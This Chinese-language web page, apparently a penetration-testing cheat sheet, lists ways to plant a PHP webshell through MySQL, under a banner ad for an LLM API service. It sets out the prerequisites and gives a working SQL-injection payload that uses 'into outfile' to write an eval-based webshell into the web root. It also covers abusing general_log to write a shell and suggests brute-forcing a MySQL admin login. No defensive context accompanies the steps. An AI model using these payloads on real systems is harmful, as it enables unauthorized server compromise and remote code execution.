💎一站式轻松地调用各大LLM模型接口,支持GPT4、智谱、豆包、星火、月之暗面及文生图、文生视频 广告
[TOC] ## 常见的getshell方式 * 通过 into outfile 写入webshell * 通过日志(general_log)写入webshell ## 通过into outfile写入shell * 前提 web目录具有读写权限,能够使用引号(未开启全局GPC) 知道网站的绝对路径,根目录或者根目录下的文件 secure_file_pirv没有具体值或设置为网站根目录或根目录下某个文件 * 例子 ``` union select 1,2,"<?php @eval($POST['cmd']) ;?>" into outfile "根目录"--+ ``` ## 通过general\_log日志写入 * 前提 开启general_log模式:general_log=on 设置日志地址为webshell的地址:general_log_file="网站目录/shell的地址" 具有较高的权限 * 查看 general_log ``` show variables like "%general%"; ``` * 利用 先去找到目标的mysql管理页面,然后爆破账户密码,从而进入数据库,修改权限